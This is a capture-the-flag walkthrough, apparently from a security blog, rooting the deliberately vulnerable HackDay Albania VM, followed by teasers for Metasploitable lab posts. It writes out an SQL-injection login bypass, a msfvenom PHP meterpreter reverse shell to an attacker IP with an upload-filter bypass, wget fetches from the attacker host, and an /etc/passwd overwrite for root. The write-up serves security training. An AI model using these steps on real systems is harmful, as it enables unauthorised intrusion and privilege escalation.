Chuyển đến nội dung chính

Hack the Hackday Albania VM (CTF Challenge)

This was used in HackDay Albania’s 2016 CTF. It uses DHCP.
Note: VMware users may have issues with the network interface doing down by default. You are recommended to use Virtualbox.
 Download the lab from: https://www.vulnhub.com/entry/hackday-albania,167/
 Let’s begin. First we run netdiscover(as usual).
netdiscover
Next we run nmap
nmap -p- A 192.168.0.103

Nmap result shows that our target is running http on port no.8008. So, we fire up our browser targeting http://192.168.0.103:8008
The message in the box translates to- “if I am, I know where to go :)”
We try for some hint in the page-source and find a comment at the bottom “Ok ok, but not here :)” Next we run nikto on our target
nikto -h 192.168.0.103:8008
Upon discovering the existence of robots.txt, we open it up on our browser
http://192.168.0.103:8008/robots.txt

All but one directory give us the same result.

The directory that proves to be worth visiting is http://192.168.0.103:8008/unisxcudkqjydw/

So, we discover another useful directory. Lets head towards it
http://192.168.0.103:8008/unisxcudkqjydw/vulnbank/

Clicking on the client/ directory, we are greeted by a login page of very secure bank

Upon trying a single ‘as the username, we get an error page.

After trying multiple credentials, we finally succeed in logging in as the first user
‘ or ‘a’ = ‘a’ —
#

On the welcome page, we can find an option to upload a file. Let us create a php payload using msfvenom and try uploading it.
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.106 lport=4444 -f raw
We copy the php code and save it on a leafpad and save it in the name ra.php We try to upload the file but the webpage displays an error- “After we got hackedwe are allowing only image filesto upload such as jpg,jpeg, bmp etc…” Let’s rename our file to ra.jpg and try uploading it again.
Start the msf handler. msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.106
set lport 4444
exploit

Now we click on view ticket option under ra.jpg on our browser

And we have our meterpreter session. To get a proper shell and reach the tmp folder and find the os release, we fire up the following commands:
shell
python3 -c ‘import pty; pty.spawn(“/bin/bash”);’
cd /tmp
lsb_release -a
Kernel exploits do not seem to work here since gcc is not installed on our target machine. So, we decide to go the other way. We download a shell called LinEnum.sh from github on another terminal using-
git clone https://github.com/rebootuser/LinEnum.git
Thereafter we start apache service on our machine
service apache2 start
Thereafter, we copy the LinEnum.sh file to var/www/html folder of our machine and returning to our victim’s shell, we upload the file to his tmp folder
wget http://192.168.1.106/LinEnum.sh
Thereafter, change the permission of the uploaded file and run it.
chmod 777 LinEnum.sh
./LinEnum.sh
We discover that etc/passwd folder is writable.

And the encryption used by our victim’s machine is SHA512

We open the victim’s password file on the terminal itself
cat /etc/passwd

We then copy the entire contents of the file and copy it to a leafpad and name it as passwd. To know more about etc/passwd, please visit https://www.cyberciti.biz/faq/understanding-etcpasswd-file-format/ or https://www.digitalocean.com/community/tutorials/how-to-use-passwd-and-adduser-to-manage-passwords-on-a-linux-vps
Thereafter on another terminal, we generate a SHA512 encryption for a password “raj”
python -c ‘import crypt; print crypt.crypt(“raj”, “$6$saltsalt$”)’
We now copy this hash and replace it with the ‘x’ in the last line of our passwd file which we just saved in leafpad.

Next, we place this file named passwd in the var/www/html folder of our machine and upload it to the victim’s tmp folder
wget http://192.168.0.106/passwd
Now copy and replace this file with the passwd file present inside the etc folder.
cp passwd /etc/passwd
Then we try logging in with the user taviso
su taviso
raj
Next we try the root’s login
sudo -i
raj
Success. Now list the contents
ls
here’s our flag. Read its contents using
cat flag.txt

Urime,
Tani nis raportin!
Which translates to:-
Congratulations,
Now begins the report!

Researcher and Author: Jitesh Khanna is a passionate Researcher and Technical Writer at Hacking Articles. He is a hacking enthusiast.

Bài đăng phổ biến từ blog này

Pentest lab - Metasploitable 2

Today I will walk through different ways of exploiting Metasploitable 2, the newer release of Rapid7’s popular vulnerable machine. First, what is Metasploitable? Metasploitable is an intentionally vulnerable Linux virtual machine. This VM can be used to conduct security training, test security tools, and practice common penetration testing techniques. In my lab environment, the IP of the attacker machine is 192.168.127.159, and the victim machine is 192.168.127.154. Since this is a test lab, I won’t be concerned about stealth. Instead, I will try to get the most information out of the scans. Let’s start by port scanning the target with nmap. I did a full port, aggresive scan against the target. Here are the results. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 ...

Metasploitable 2 vulnerability assessment

A vulnerability assessment is a crucial part in every penetration test and is the process of identifying and assessing vulnerabilities on a target system. In this part of the tutorial we will be assessing the vulnerabilities available on the network side of the Metasploitable 2 virtual machine. We will be assessing the web applications on the Metasploitable 2 machine in a later tutorial. In the previous Metasploit enumeration and fingerprinting tutorial we’ve learned that the Metasploitable 2 machine contains a lot of vulnerabilities. We have collected valuable information about the target system which we will be using to find known vulnerabilities both on- and offline. Exploitation of these vulnerabilities will be demonstrated in the next exploitation tutorial. In this tutorial we will be looking at a few different ways to perform vulnerability analysis. We will be manually searching for exploits, use scanning tools like Nmap with scripts and we will be...

CEH v9 (CEHVIETNAM.COM) - Hacking Metasploitable Lab

CEH v9 : Hacking Metasploitable VM In this guide, I will demonstrate how to root a Metasploitable 2 virtual machine. Metasploitable is an intentionally vulnerable Ubuntu machine. I’ll explore just a few of the many ways Metasploitable can be attacked, from vulnerabilities in common services to little known exploits and web vulnerabilities. I’ve set up Kali Linux and Metasploitable VMs in VirtualBox on the same network (bridged mode). Kali – 192.168.56.101 Metasploitable – 192.168.56.102 - Hãy thay IP của bạn cho thích hợp Contents   1 Footprinting 1.1 Ping 1.2 Traceroute 2 Scanning 2.1 Port Scanning 2.2 OS Fingerprinting 2.2.1 nmap 2.2.2 xprobe2 3 Enumeration 3.1 FTP (TCP 21) Enumeration 3.2 Telnet (TCP 53) Enumeration 3.3 SMTP (TCP 25) Enumeration 3.4 VNC (TCP 5900) Enumeration 3.5 X11 (TCP 6000) Enumeration 3.6 RLogin (TCP 513) Enumeration 3.7 IRC (TCP 6667) Enumeration 4 Exploitation 4.1 FTP Exploit 4.2 VNC Password Cracking 4.3 IRC E...